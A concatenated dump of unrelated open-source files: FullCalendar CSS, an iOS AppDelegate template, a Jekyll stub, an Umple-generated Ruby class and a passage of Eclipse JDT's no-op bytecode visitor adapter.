border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
color: #333;
text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
}
.fc-state-hover,
.fc-state-down,
.fc-state-active,
.fc-state-disabled {
color: #333333;
background-color: #e6e6e6;
}
.fc-state-hover {
color: #333333;
text-decoration: none;
background-position: 0 -15px;
-webkit-transition: background-position 0.1s linear;
-moz-transition: background-position 0.1s linear;
-o-transition: background-position 0.1s linear;
transition: background-position 0.1s linear;
}
.fc-state-down,
.fc-state-active {
background-color: #cccccc;
background-image: none;
box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05);
}
.fc-state-disabled {
cursor: default;
background-image: none;
opacity: 0.65;
filter: alpha(opacity=65);
box-shadow: none;
}
/* Buttons Groups
--------------------------------------------------------------------------------------------------*/
.fc-button-group {
display: inline-block;
}
/*
every button that is not first in a button group should scootch over one pixel and cover the
previous button's border...
*/
.fc .fc-button-group > * { /* extra precedence b/c buttons have margin set to zero */
float: left;
margin: 0 0 0 -1px;
}
.fc .fc-button-group > :first-child { /* same */
margin-left: 0;
}
/* Popover
--------------------------------------------------------------------------------------------------*/
.fc-popover {
position: absolute;
box-shadow: 0 2px 6px rgba(0,0,0,.15);
}
.fc-popover .fc-header {
padding: 2px 4px;
}
.fc-popover .fc-header .fc-title {
margin: 0 2px;
}
.fc-popover .fc-header .fc-close {
cursor: pointer;
}
.fc-ltr .fc-popover .fc-header .fc-title,
.fc-rtl .fc-popover .fc-header .fc-close {
float: left;
}
.fc-rtl .fc-popover .fc-header .fc-title,
.fc-ltr .fc-popover .fc-header .fc-close {
float: right;
}
/* unthemed */
.fc-unthemed .fc-popover {
border-width: 1px;
border-style: solid;
}
.fc-unthemed .fc-popover .fc-header .fc-close {
font-size: 25px;
margin-top: 4px;
}
/* jqui themed */
.fc-popover > .ui-widget-header + .ui-widget-content {
border-top: 0; /* where they meet, let the header have the border */
}
/* Misc Reusable Components
--------------------------------------------------------------------------------------------------*/
.fc hr {
height: 0;
margin: 0;
padding: 0 0 2px; /* height is unreliable across browsers, so use padding */
border-style: solid;
border-width: 1px 0;
}
.fc-clear {
clear: both;
}
.fc-bg,
.fc-bgevent-skeleton,
.fc-highlight-skeleton,
.fc-helper-skeleton {
/* these element should always cling to top-left/right corners */
position: absolute;
top: 0;
left: 0;
right: 0;
}
.fc-bg {
bottom: 0; /* strech bg to bottom edge */
}
.fc-bg table {
height: 100%; /* strech bg to bottom edge */
}
/* Tables
--------------------------------------------------------------------------------------------------*/
.fc table {
width: 100%;
table-layout: fixed;
border-collapse: collapse;
border-spacing: 0;
font-size: 1em; /* normalize cross-browser */
}
.fc th {
text-align: center;
}
.fc th,
.fc td {
border-style: solid;
border-width: 1px;
padding: 0;
vertical-align: top;
}
.fc td.fc-today {
border-style: double; /* overcome neighboring borders */
}
/* Fake Table Rows
--------------------------------------------------------------------------------------------------*/
.fc .fc-row { /* extra precedence to overcome themes w/ .ui-widget-content forcing a 1px border */
/* no visible border by default. but make available if need be (scrollbar width compensation) */
border-style: solid;
border-width: 0;
}
.fc-row table {
/* don't put left/right border on anything within a fake row.
the outer tbody will worry about this */
border-left: 0 hidden transparent;
border-right: 0 hidden transparent;
/* no bottom borders on rows */
border-bottom: 0 hidden transparent;
}
.fc-row:first-child table {
border-top: 0 hidden transparent; /* no top border on first row */
}
/* Day Row (used within the header and the DayGrid)
--------------------------------------------------------------------------------------------------*/
.fc-row {
position: relative;
}
.fc-row .fc-bg {
z-index: 1;
}
/* highlighting cells & background event skeleton */
.fc-row .fc-bgevent-skeleton,
.fc-row .fc-highlight-skeleton {
bottom: 0; /* stretch skeleton to bottom of row */
}
.fc-row .fc-bgevent-skeleton table,
.fc-row .fc-highlight-skeleton table {
height: 100%; /* stretch skeleton to bottom of row */
}
.fc-row .fc-highlight-skeleton td,
.fc-row .fc-bgevent-skeleton td {
border-color: transparent;
}
.fc-row .fc-bgevent-skeleton {
z-index: 2;
}
.fc-row .fc-highlight-skeleton {
z-index: 3;
}
/*
row content (which contains day/week numbers and events) as well as "helper" (which contains
temporary rendered events).
*/
.fc-row .fc-content-skeleton {
position: relative;
z-index: 4;
padding-bottom: 2px; /* matches the space above the events */
}
.fc-row .fc-helper-skeleton {
z-index: 5;
}
.fc-row .fc-content-skeleton td,
.fc-row .fc-helper-skeleton td {
/* see-through to the background below */
background: none; /* in case <td>s are globally styled */
border-color: transparent;
/* don't put a border between events and/or the day number */
border-bottom: 0;
}
.fc-row .fc-content-skeleton tbody td, /* cells with events inside (so NOT the day number cell) */
.fc-row .fc-helper-skeleton tbody td {
/* don't put a border between event cells */
border-top: 0;
}
/* Scrolling Container
--------------------------------------------------------------------------------------------------*/
.fc-scroller { /* this class goes on elements for guaranteed vertical scrollbars */
overflow-y: scroll;
overflow-x: hidden;
}
.fc-scroller > * { /* we expect an immediate inner element */
position: relative; /* re-scope all positions */
width: 100%; /* hack to force re-sizing this inner element when scrollbars appear/disappear */
overflow: hidden; /* don't let negative margins or absolute positioning create further scroll */
}
/* Global Event Styles
--------------------------------------------------------------------------------------------------*/
.fc-event {
position: relative; /* for resize handle and other inner positioning */
display: block; /* make the <a> tag block */
font-size: .85em;
line-height: 1.3;
border-radius: 3px;
border: 1px solid #3a87ad; /* default BORDER color */
background-color: #3a87ad; /* default BACKGROUND color */
font-weight: normal; /* undo jqui's ui-widget-header bold */
}
/* overpower some of bootstrap's and jqui's styles on <a> tags */
.fc-event,
.fc-event:hover,
.ui-widget .fc-event {
color: #fff; /* default TEXT color */
text-decoration: none; /* if <a> has an href */
}
.fc-event[href],
.fc-event.fc-draggable {
cursor: pointer; /* give events with links and draggable events a hand mouse pointer */
}
.fc-not-allowed, /* causes a "warning" cursor. applied on body */
.fc-not-allowed .fc-event { /* to override an event's custom cursor */
cursor: not-allowed;
}
/* DayGrid events
----------------------------------------------------------------------------------------------------
We use the full "fc-day-grid-event" class instead of using descendants because the event won't
be a descendant of the grid when it is being dragged.
*/
.fc-day-grid-event {
margin: 1px 2px 0; /* spacing between events and edges */
padding: 0 1px;
}
/* events that are continuing to/from another week. kill rounded corners and butt up against edge */
.fc-ltr .fc-day-grid-event.fc-not-start,
.fc-rtl .fc-day-grid-event.fc-not-end {
margin-left: 0;
border-left-width: 0;
padding-left: 1px; /* replace the border with padding */
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.fc-ltr .fc-day-grid-event.fc-not-end,
.fc-rtl .fc-day-grid-event.fc-not-start {
margin-right: 0;
border-right-width: 0;
padding-right: 1px; /* replace the border with padding */
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.fc-day-grid-event > .fc-content { /* force events to be one-line tall */
white-space: nowrap;
overflow: hidden;
}
.fc-day-grid-event .fc-time {
font-weight: bold;
}
/* resize handle (outside of fc-content, so can go outside of bounds) */
.fc-day-grid-event .fc-resizer {
position: absolute;
top: 0;
bottom: 0;
width: 7px;
}
.fc-ltr .fc-day-grid-event .fc-resizer {
right: -3px;
cursor: e-resize;
}
.fc-rtl .fc-day-grid-event .fc-resizer {
left: -3px;
cursor: w-resize;
}
/* Event Limiting
--------------------------------------------------------------------------------------------------*/
/* "more" link that represents hidden events */
a.fc-more {
margin: 1px 3px;
font-size: .85em;
cursor: pointer;
text-decoration: none;
}
a.fc-more:hover {
text-decoration: underline;
}
.fc-limited { /* rows and cells that are hidden because of a "more" link */
display: none;
}
/* popover that appears when "more" link is clicked */
.fc-day-grid .fc-row {
z-index: 1; /* make the "more" popover one higher than this */
}
.fc-more-popover {
z-index: 2;
width: 220px;
}
.fc-more-popover .fc-event-container {
padding: 10px;
}
/* Toolbar
--------------------------------------------------------------------------------------------------*/
.fc-toolbar {
text-align: center;
margin-bottom: 1em;
}
.fc-toolbar .fc-left {
float: left;
}
.fc-toolbar .fc-right {
float: right;
}
.fc-toolbar .fc-center {
display: inline-block;
}
/* the things within each left/right/center section */
.fc .fc-toolbar > * > * { /* extra precedence to override button border margins */
float: left;
margin-left: .75em;
}
/* the first thing within each left/center/right section */
.fc .fc-toolbar > * > :first-child { /* extra precedence to override button border margins */
margin-left: 0;
}
/* title text */
.fc-toolbar h2 {
margin: 0;
}
/* button layering (for border precedence) */
.fc-toolbar button {
position: relative;
}
.fc-toolbar .fc-state-hover,
.fc-toolbar .ui-state-hover {
z-index: 2;
}
.fc-toolbar .fc-state-down {
z-index: 3;
}
.fc-toolbar .fc-state-active,
.fc-toolbar .ui-state-active {
z-index: 4;
}
.fc-toolbar button:focus {
z-index: 5;
}
/* View Structure
--------------------------------------------------------------------------------------------------*/
/* undo twitter bootstrap's box-sizing rules. normalizes positioning techniques */
/* don't do this for the toolbar because we'll want bootstrap to style those buttons as some pt */
.fc-view-container *,
.fc-view-container *:before,
.fc-view-container *:after {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
}
.fc-view, /* scope positioning and z-index's for everything within the view */
.fc-view > table { /* so dragged elements can be above the view's main element */
position: relative;
z-index: 1;
}
/* BasicView
--------------------------------------------------------------------------------------------------*/
/* day row structure */
.fc-basicWeek-view .fc-content-skeleton,
.fc-basicDay-view .fc-content-skeleton {
/* we are sure there are no day numbers in these views, so... */
padding-top: 1px; /* add a pixel to make sure there are 2px padding above events */
padding-bottom: 1em; /* ensure a space at bottom of cell for user selecting/clicking */
}
.fc-basic-view tbody .fc-row {
min-height: 4em; /* ensure that all rows are at least this tall */
}
/* a "rigid" row will take up a constant amount of height because content-skeleton is absolute */
.fc-row.fc-rigid {
overflow: hidden;
}
.fc-row.fc-rigid .fc-content-skeleton {
position: absolute;
top: 0;
left: 0;
right: 0;
}
/* week and day number styling */
.fc-basic-view .fc-week-number,
.fc-basic-view .fc-day-number {
padding: 0 2px;
}
.fc-basic-view td.fc-week-number span,
.fc-basic-view td.fc-day-number {
padding-top: 2px;
padding-bottom: 2px;
}
.fc-basic-view .fc-week-number {
text-align: center;
}
.fc-basic-view .fc-week-number span {
/* work around the way we do column resizing and ensure a minimum width */
display: inline-block;
min-width: 1.25em;
}
.fc-ltr .fc-basic-view .fc-day-number {
text-align: right;
}
.fc-rtl .fc-basic-view .fc-day-number {
text-align: left;
}
.fc-day-number.fc-other-month {
opacity: 0.3;
filter: alpha(opacity=30); /* for IE */
/* opacity with small font can sometimes look too faded
might want to set the 'color' property instead
making day-numbers bold also fixes the problem */
}
/* AgendaView all-day area
--------------------------------------------------------------------------------------------------*/
.fc-agenda-view .fc-day-grid {
position: relative;
z-index: 2; /* so the "more.." popover will be over the time grid */
}
.fc-agenda-view .fc-day-grid .fc-row {
min-height: 3em; /* all-day section will never get shorter than this */
}
.fc-agenda-view .fc-day-grid .fc-row .fc-content-skeleton {
padding-top: 1px; /* add a pixel to make sure there are 2px padding above events */
padding-bottom: 1em; /* give space underneath events for clicking/selecting days */
}
/* TimeGrid axis running down the side (for both the all-day area and the slot area)
--------------------------------------------------------------------------------------------------*/
.fc .fc-axis { /* .fc to overcome default cell styles */
vertical-align: middle;
padding: 0 4px;
white-space: nowrap;
}
.fc-ltr .fc-axis {
text-align: right;
}
.fc-rtl .fc-axis {
text-align: left;
}
.ui-widget td.fc-axis {
font-weight: normal; /* overcome jqui theme making it bold */
}
/* TimeGrid Structure
--------------------------------------------------------------------------------------------------*/
.fc-time-grid-container, /* so scroll container's z-index is below all-day */
.fc-time-grid { /* so slats/bg/content/etc positions get scoped within here */
position: relative;
z-index: 1;
}
.fc-time-grid {
min-height: 100%; /* so if height setting is 'auto', .fc-bg stretches to fill height */
}
.fc-time-grid table { /* don't put outer borders on slats/bg/content/etc */
border: 0 hidden transparent;
}
.fc-time-grid > .fc-bg {
z-index: 1;
}
.fc-time-grid .fc-slats,
.fc-time-grid > hr { /* the <hr> AgendaView injects when grid is shorter than scroller */
position: relative;
z-index: 2;
}
.fc-time-grid .fc-bgevent-skeleton,
.fc-time-grid .fc-content-skeleton {
position: absolute;
top: 0;
left: 0;
right: 0;
}
.fc-time-grid .fc-bgevent-skeleton {
z-index: 3;
}
.fc-time-grid .fc-highlight-skeleton {
z-index: 4;
}
.fc-time-grid .fc-content-skeleton {
z-index: 5;
}
.fc-time-grid .fc-helper-skeleton {
z-index: 6;
}
/* TimeGrid Slats (lines that run horizontally)
--------------------------------------------------------------------------------------------------*/
.fc-slats td {
height: 1.5em;
border-bottom: 0; /* each cell is responsible for its top border */
}
.fc-slats .fc-minor td {
border-top-style: dotted;
}
.fc-slats .ui-widget-content { /* for jqui theme */
background: none; /* see through to fc-bg */
}
/* TimeGrid Highlighting Slots
--------------------------------------------------------------------------------------------------*/
.fc-time-grid .fc-highlight-container { /* a div within a cell within the fc-highlight-skeleton */
position: relative; /* scopes the left/right of the fc-highlight to be in the column */
}
.fc-time-grid .fc-highlight {
position: absolute;
left: 0;
right: 0;
/* top and bottom will be in by JS */
}
/* TimeGrid Event Containment
--------------------------------------------------------------------------------------------------*/
.fc-time-grid .fc-event-container, /* a div within a cell within the fc-content-skeleton */
.fc-time-grid .fc-bgevent-container { /* a div within a cell within the fc-bgevent-skeleton */
position: relative;
}
.fc-ltr .fc-time-grid .fc-event-container { /* space on the sides of events for LTR (default) */
margin: 0 2.5% 0 2px;
}
.fc-rtl .fc-time-grid .fc-event-container { /* space on the sides of events for RTL */
margin: 0 2px 0 2.5%;
}
.fc-time-grid .fc-event,
.fc-time-grid .fc-bgevent {
position: absolute;
z-index: 1; /* scope inner z-index's */
}
.fc-time-grid .fc-bgevent {
/* background events always span full width */
left: 0;
right: 0;
}
/* TimeGrid Event Styling
----------------------------------------------------------------------------------------------------
We use the full "fc-time-grid-event" class instead of using descendants because the event won't
be a descendant of the grid when it is being dragged.
*/
.fc-time-grid-event.fc-not-start { /* events that are continuing from another day */
/* replace space made by the top border with padding */
border-top-width: 0;
padding-top: 1px;
/* remove top rounded corners */
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.fc-time-grid-event.fc-not-end {
/* replace space made by the top border with padding */
border-bottom-width: 0;
padding-bottom: 1px;
/* remove bottom rounded corners */
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
}
.fc-time-grid-event {
overflow: hidden; /* don't let the bg flow over rounded corners */
}
.fc-time-grid-event > .fc-content { /* contains the time and title, but no bg and resizer */
position: relative;
z-index: 2; /* above the bg */
}
.fc-time-grid-event .fc-time,
.fc-time-grid-event .fc-title {
padding: 0 1px;
}
.fc-time-grid-event .fc-time {
font-size: .85em;
white-space: nowrap;
}
.fc-time-grid-event .fc-bg {
z-index: 1;
background: #fff;
opacity: .25;
filter: alpha(opacity=25); /* for IE */
}
/* short mode, where time and title are on the same line */
.fc-time-grid-event.fc-short .fc-content {
/* don't wrap to second line (now that contents will be inline) */
white-space: nowrap;
}
.fc-time-grid-event.fc-short .fc-time,
.fc-time-grid-event.fc-short .fc-title {
/* put the time and title on the same line */
display: inline-block;
vertical-align: top;
}
.fc-time-grid-event.fc-short .fc-time span {
display: none; /* don't display the full time text... */
}
.fc-time-grid-event.fc-short .fc-time:before {
content: attr(data-start); /* ...instead, display only the start time */
}
.fc-time-grid-event.fc-short .fc-time:after {
content: "\000A0-\000A0"; /* seperate with a dash, wrapped in nbsp's */
}
.fc-time-grid-event.fc-short .fc-title {
font-size: .85em; /* make the title text the same size as the time */
padding: 0; /* undo padding from above */
}
/* resizer */
.fc-time-grid-event .fc-resizer {
position: absolute;
z-index: 3; /* above content */
left: 0;
right: 0;
bottom: 0;
height: 8px;
overflow: hidden;
line-height: 8px;
font-size: 11px;
font-family: monospace;
text-align: center;
cursor: s-resize;
}
.fc-time-grid-event .fc-resizer:after {
content: "=";
}
|
{
"pile_set_name": "Github"
}
|
//
// AppDelegate.m
// Polymer
//
// Created by Logan Wright on 2/26/15.
// Copyright (c) 2015 LowriDevs. All rights reserved.
//
#import "AppDelegate.h"
@interface AppDelegate ()
@end
@implementation AppDelegate
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
// Override point for customization after application launch.
return YES;
}
- (void)applicationWillResignActive:(UIApplication *)application {
// Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
// Use this method to pause ongoing tasks, disable timers, and throttle down OpenGL ES frame rates. Games should use this method to pause the game.
}
- (void)applicationDidEnterBackground:(UIApplication *)application {
// Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
// If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}
- (void)applicationWillEnterForeground:(UIApplication *)application {
// Called as part of the transition from the background to the inactive state; here you can undo many of the changes made on entering the background.
}
- (void)applicationDidBecomeActive:(UIApplication *)application {
// Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}
- (void)applicationWillTerminate:(UIApplication *)application {
// Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}
@end
|
{
"pile_set_name": "Github"
}
|
---
layout: api
nav: api
type: Vtk.ThreadedImageAlgorithm
---
|
{
"pile_set_name": "Github"
}
|
# PLEASE DO NOT EDIT THIS CODE
# This code was generated using the UMPLE @UMPLE_VERSION@ modeling language!
# NOTE: Ruby generator is experimental and is missing some features available in
# in other Umple generated languages like Java or PHP
module Example
class Student
#------------------------
# MEMBER VARIABLES
#------------------------
#Student Attributes - for documentation purposes
#attr_reader :number
#Student Associations - for documentation purposes
#attr_reader :mentors
#------------------------
# CONSTRUCTOR
#------------------------
def initialize(a_number)
@initialized = false
@deleted = false
@number = a_number
@mentors = []
@initialized = true
end
#------------------------
# INTERFACE
#------------------------
def set_number(a_number)
was_set = false
@number = a_number
was_set = true
was_set
end
def get_number
@number
end
def get_mentor(index)
a_mentor = @mentors[index]
a_mentor
end
def get_mentors
new_mentors = @mentors.dup
new_mentors
end
def number_of_mentors
number = @mentors.size
number
end
def has_mentors
has = @mentors.size > 0
has
end
def index_of_mentor(a_mentor)
index = @mentors.index(a_mentor)
index = -1 if index.nil?
index
end
def is_number_of_mentors_valid
is_valid = number_of_mentors >= Student.minimum_number_of_mentors and number_of_mentors <= Student.maximum_number_of_mentors
is_valid
end
def self.minimum_number_of_mentors
1
end
def self.maximum_number_of_mentors
2
end
def add_mentor(a_mentor)
was_added = false
return false if index_of_mentor(a_mentor) != -1
if number_of_mentors >= Student.maximum_number_of_mentors
return was_added
end
@mentors << a_mentor
if a_mentor.index_of_student(self) != -1
was_added = true
else
was_added = a_mentor.add_student(self)
unless was_added
@mentors.delete(a_mentor)
end
end
was_added
end
def remove_mentor(a_mentor)
was_removed = false
unless @mentors.include?(a_mentor)
return was_removed
end
if number_of_mentors <= Student.minimum_number_of_mentors
return was_removed
end
oldIndex = @mentors.index(a_mentor)
@mentors.delete_at(oldIndex)
if a_mentor.index_of_student(self) == -1
was_removed = true
else
was_removed = a_mentor.remove_student(self)
@mentors.insert(oldIndex,a_mentor) unless was_removed
end
was_removed
end
def add_mentor_at(a_mentor, index)
was_added = false
if add_mentor(a_mentor)
if(index < 0)
index = 0
end
if(index > number_of_mentors())
index = number_of_mentors() - 1
end
@mentors.delete(a_mentor)
@mentors.insert(index, a_mentor)
was_added = true
end
was_added
end
def add_or_move_mentor_at(a_mentor, index)
was_added = false
if @mentors.include?(a_mentor)
if(index < 0)
index = 0
end
if(index > number_of_mentors())
index = number_of_mentors() - 1
end
@mentors.delete(a_mentor)
@mentors.insert(index, a_mentor)
was_added = true
else
was_added = add_mentor_at(a_mentor, index)
end
was_added
end
def delete
@deleted = true
copy_of_mentors = @mentors.dup
@mentors.clear
copy_of_mentors.each do |a_mentor|
a_mentor.remove_student(self)
end
end
end
end
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2000, 2011 IBM Corporation and others.
*
* This program and the accompanying materials
* are made available under the terms of the Eclipse Public License 2.0
* which accompanies this distribution, and is available at
* https://www.eclipse.org/legal/epl-2.0/
*
* SPDX-License-Identifier: EPL-2.0
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package org.eclipse.jdt.core.util;
/**
* Adapter that implements the IBytecodeVisitor. This class is intended to
* be subclassed by clients.
*
* @since 2.0
*/
public class ByteCodeVisitorAdapter implements IBytecodeVisitor {
/**
* @see IBytecodeVisitor#_aaload(int)
*/
@Override
public void _aaload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aastore(int)
*/
@Override
public void _aastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aconst_null(int)
*/
@Override
public void _aconst_null(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_0(int)
*/
@Override
public void _aload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_1(int)
*/
@Override
public void _aload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_2(int)
*/
@Override
public void _aload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_3(int)
*/
@Override
public void _aload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload(int, int)
*/
@Override
public void _aload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_anewarray(int, int, IConstantPoolEntry)
*/
@Override
public void _anewarray(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_areturn(int)
*/
@Override
public void _areturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_arraylength(int)
*/
@Override
public void _arraylength(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_0(int)
*/
@Override
public void _astore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_1(int)
*/
@Override
public void _astore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_2(int)
*/
@Override
public void _astore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_3(int)
*/
@Override
public void _astore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore(int, int)
*/
@Override
public void _astore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_athrow(int)
*/
@Override
public void _athrow(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_baload(int)
*/
@Override
public void _baload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_bastore(int)
*/
@Override
public void _bastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_bipush(int, byte)
*/
@Override
public void _bipush(int pc, byte _byte) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_caload(int)
*/
@Override
public void _caload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_castore(int)
*/
@Override
public void _castore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_checkcast(int, int, IConstantPoolEntry)
*/
@Override
public void _checkcast(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2f(int)
*/
@Override
public void _d2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2i(int)
*/
@Override
public void _d2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2l(int)
*/
@Override
public void _d2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dadd(int)
*/
@Override
public void _dadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_daload(int)
*/
@Override
public void _daload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dastore(int)
*/
@Override
public void _dastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dcmpg(int)
*/
@Override
public void _dcmpg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dcmpl(int)
*/
@Override
public void _dcmpl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dconst_0(int)
*/
@Override
public void _dconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dconst_1(int)
*/
@Override
public void _dconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ddiv(int)
*/
@Override
public void _ddiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_0(int)
*/
@Override
public void _dload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_1(int)
*/
@Override
public void _dload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_2(int)
*/
@Override
public void _dload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_3(int)
*/
@Override
public void _dload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload(int, int)
*/
@Override
public void _dload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dmul(int)
*/
@Override
public void _dmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dneg(int)
*/
@Override
public void _dneg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_drem(int)
*/
@Override
public void _drem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dreturn(int)
*/
@Override
public void _dreturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_0(int)
*/
@Override
public void _dstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_1(int)
*/
@Override
public void _dstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_2(int)
*/
@Override
public void _dstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_3(int)
*/
@Override
public void _dstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore(int, int)
*/
@Override
public void _dstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dsub(int)
*/
@Override
public void _dsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup_x1(int)
*/
@Override
public void _dup_x1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup_x2(int)
*/
@Override
public void _dup_x2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup(int)
*/
@Override
public void _dup(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2_x1(int)
*/
@Override
public void _dup2_x1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2_x2(int)
*/
@Override
public void _dup2_x2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2(int)
*/
@Override
public void _dup2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2d(int)
*/
@Override
public void _f2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2i(int)
*/
@Override
public void _f2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2l(int)
*/
@Override
public void _f2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fadd(int)
*/
@Override
public void _fadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_faload(int)
*/
@Override
public void _faload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fastore(int)
*/
@Override
public void _fastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fcmpg(int)
*/
@Override
public void _fcmpg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fcmpl(int)
*/
@Override
public void _fcmpl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_0(int)
*/
@Override
public void _fconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_1(int)
*/
@Override
public void _fconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_2(int)
*/
@Override
public void _fconst_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fdiv(int)
*/
@Override
public void _fdiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_0(int)
*/
@Override
public void _fload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_1(int)
*/
@Override
public void _fload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_2(int)
*/
@Override
public void _fload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_3(int)
*/
@Override
public void _fload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload(int, int)
*/
@Override
public void _fload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fmul(int)
*/
@Override
public void _fmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fneg(int)
*/
@Override
public void _fneg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_frem(int)
*/
@Override
public void _frem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_freturn(int)
*/
@Override
public void _freturn(int pc) {
